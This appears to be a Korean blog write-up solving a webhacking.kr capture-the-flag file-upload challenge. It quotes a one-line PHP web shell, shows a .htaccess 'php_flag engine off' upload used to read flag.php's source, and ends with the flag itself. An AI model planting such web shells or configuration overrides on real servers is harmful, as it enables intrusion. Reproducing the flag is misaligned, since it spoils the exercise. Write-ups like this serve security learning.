반응형
https://webhacking.kr/chall.php
Webhacking.kr
webhacking.kr
[문제]
[풀이]
파일을 업로드할 수 있는 페이지이다.
미션이 주어진다. ./upload/KCjalhofep8S/flag.php 를 읽으면 된다.
웹쉘을 시도해본다.
<?php
system($_GET[cmd]);
?>위같은 코드를 php로 저장한 뒤 업로드 해본다.
업로드 한 뒤 파일을 열어보니 '<'가 필터링 된다.
계속 시도해보다가 다른 방법을 찾아봤다.
먼저 flag.php가 안열리는 이유를 알아보았다.
flag.php의 코드가 실행되어서 안보이는 것 같았다.
실행하지 않고 코드를 확인하는 방법을 구글링 해보았다.
.htaccess 파일을 이용하면 코드를 확인할 수 있다고 한다.
php_flag engine off위 코드를 짜준 뒤 .htaccess 파일로 저장해준다.
파일을 업로드 후 제출한다.
정상적으로 업로드 되었고
flag.php를 열어본다.
Flag값이 노출된다.
[FLAG]
FLAG{easy_peasy_apachy}반응형
